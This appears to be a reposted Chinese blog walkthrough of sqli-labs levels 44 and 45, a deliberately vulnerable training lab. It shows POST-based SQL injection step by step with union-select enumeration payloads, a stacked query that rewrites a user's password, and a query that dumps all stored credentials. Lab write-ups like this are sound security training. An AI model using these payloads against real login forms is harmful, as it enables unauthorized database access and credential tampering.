当前位置:网站首页>(手工)【sqli-labs44、45】POST字符型注入、盲注、堆叠注入

(手工)【sqli-labs44、45】POST字符型注入、盲注、堆叠注入

2022-07-15 22:34:00 黑色地带(崛起)

目录

一、推荐:

二、(手工)SQL注入基本步骤:

三、Less44(POST - Error based - String - Stacked - Blind)

3.1、简介:(堆叠注入-盲注-字符型注入)

3.1、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

 3.8、第七步:堆叠注入账号

3.9、第八步:爆数据

四、Less45(POST - Error based - String - Stacked - Blind)

5.1、简介:(堆叠注入-盲注-字符型注入)

5.2、利用:

一、推荐:

【SQL注入】堆叠注入https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450

【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:堆叠注入账号

第八步:查询

三、Less44(POST - Error based - String - Stacked - Blind)

3.1、简介:(堆叠注入-盲注-字符型注入)

请求方法:POST

方法:堆叠注入+'闭合(字符型注入)+盲注

3.1、第一步:注入点测试

在账号框输入'  "都没有报错

只提示账号错误

在密码框输入'

 在密码框输入' or '1

得到了正确的回显

通过上述测试可以得出

在密码框存在注入点,且无回显

且为'闭合

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

3.4、第三步:判断字段数/回显位

-1' union select 1,2,3#

 

3.5、第四步:暴库

-1' union select 1,database(),3# 

3.6、第五步:爆表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 


 

3.7、第六步:爆字段

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'# 

 


 

 3.8、第七步:堆叠注入账号

使用update更改账号密码

1';update users set password='1' where username='Dumb' #

但是它已经执行成功了

 

3.9、第八步:爆数据

1' union select 1,(select(group_concat(username,password))from users),3#

原始:账号Dumb  密码Dumb

改后:账号Dumb  密码1

 

四、Less45(POST - Error based - String - Stacked - Blind)

5.1、简介:(堆叠注入-盲注-字符型注入)

请求方法:POST

方法:堆叠注入+')闭合(字符型注入)+盲注

5.2、利用:

需要闭合')

原网站

版权声明
本文为[黑色地带(崛起)]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_53079406/article/details/125811977

边栏推荐

猜你喜欢

随机推荐